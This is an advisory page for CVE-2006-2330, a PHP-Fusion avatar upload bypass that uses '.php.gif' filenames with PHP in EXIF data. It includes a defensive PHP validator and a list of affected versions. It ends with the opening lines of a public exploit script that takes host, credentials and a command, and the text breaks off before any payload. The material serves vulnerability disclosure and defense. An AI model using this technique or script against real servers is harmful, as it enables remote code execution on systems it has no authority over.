CVE-2006-2330

Published: 12/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

PHP-Fusion 6.00.306 and previous versions, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allow remote authenticated users to upload files of arbitrary types by using a filename that contains two or more extensions and ends in an assumed-valid extension such as .gif, which bypasses the validation. Because Apache's mod_mime evaluates every extension in a filename, a file named with a trailing ".php.gif" can still be handed to the PHP interpreter even though it passes the .gif check. This is demonstrated by uploading and then requesting an avatar file that ends in ".php.gif" and contains PHP code in its EXIF metadata.
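The defensive counterpart of the bug described above, written here as an added example and not taken from PHP-Fusion or from the advisory: an avatar validator that never lets the client's filename reach disk, decides the image type from the file contents, and re-encodes the image through GD so that PHP source hidden in EXIF or comment segments does not survive. The constants, the avatars directory, the size limit, the use of PHP 8 match and the presence of ext/gd are assumptions for the example.

```php
<?php
// Added example (not PHP-Fusion code): validate an avatar upload so that the
// multi-extension trick (".php.gif") cannot produce a stored file that Apache
// mod_mime would route to the PHP module.

const AVATAR_MAX_BYTES     = 100 * 1024;                              // assumed site policy
const AVATAR_ALLOWED_TYPES = [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG];
const AVATAR_DIR           = __DIR__ . '/avatars';                    // assumed upload dir

/**
 * Validates the uploaded temp file and stores a re-encoded copy under a
 * server-chosen name. Returns that name, or throws on any failed check.
 * $clientName is what the browser sent; it is used for log messages only
 * and never contributes to the stored filename.
 */
function validate_avatar(string $tmpPath, string $clientName): string
{
    if (!is_file($tmpPath) || filesize($tmpPath) > AVATAR_MAX_BYTES) {
        throw new RuntimeException("rejected $clientName: missing or too large");
    }

    // Reject names with more than one extension, or any PHP-ish extension
    // anywhere in the name. This is the shape that slips past a check which
    // only looks at the final extension.
    $base = basename($clientName);
    if (substr_count($base, '.') > 1 || preg_match('/\.(php\d?|phtml|phar)/i', $base)) {
        throw new RuntimeException("rejected $clientName: suspicious filename");
    }

    // Determine the type from the bytes, not from the extension.
    $info = @getimagesize($tmpPath);
    if ($info === false || !in_array($info[2], AVATAR_ALLOWED_TYPES, true)) {
        throw new RuntimeException("rejected $clientName: not an allowed image type");
    }

    // A valid GIF/JPEG/PNG can still carry "<?php ..." in EXIF or comment
    // blocks, so decode and re-encode it; metadata is not copied across.
    $img = @imagecreatefromstring(file_get_contents($tmpPath));
    if ($img === false) {
        throw new RuntimeException("rejected $clientName: undecodable image");
    }

    // Random, single-extension name chosen by the server: the client has no
    // influence over how the web server will classify the stored file.
    $ext  = image_type_to_extension($info[2], true);   // ".gif", ".jpeg" or ".png"
    $name = bin2hex(random_bytes(16)) . $ext;
    $dest = AVATAR_DIR . '/' . $name;

    $ok = match ($info[2]) {
        IMAGETYPE_GIF  => imagegif($img, $dest),
        IMAGETYPE_JPEG => imagejpeg($img, $dest, 85),
        IMAGETYPE_PNG  => imagepng($img, $dest),
    };
    imagedestroy($img);

    if (!$ok) {
        throw new RuntimeException("could not write re-encoded avatar for $clientName");
    }
    return $name;
}

// Typical call site after a multipart POST (field name "avatar" assumed):
// $stored = validate_avatar($_FILES['avatar']['tmp_name'], $_FILES['avatar']['name']);
```

The filename check is deliberately redundant with the rename: it costs nothing and gives a clear log signal when someone probes with a double extension. As a second layer, the avatars directory should also be configured so that the server never executes scripts from it (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a mis-stored file cannot run.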

Vulnerable Products

PHP-Fusion 6.00.105
PHP-Fusion 6.00.106
PHP-Fusion 6.00.107
PHP-Fusion 6.00.109
PHP-Fusion 6.00.110
PHP-Fusion 6.00.204
PHP-Fusion 6.00.206
PHP-Fusion 6.00.3
PHP-Fusion 6.00.303
PHP-Fusion 6.00.304
PHP-Fusion 6.00.306

Exploits

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PHPFusion <= v6.00.306 avatar mod_mime arbitrary file upload &\r\n";
echo "local inclusion vulnerabilities\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: retrogod.altervista.org\r\n\r\n";
if ($argc<6) {
  echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
  ...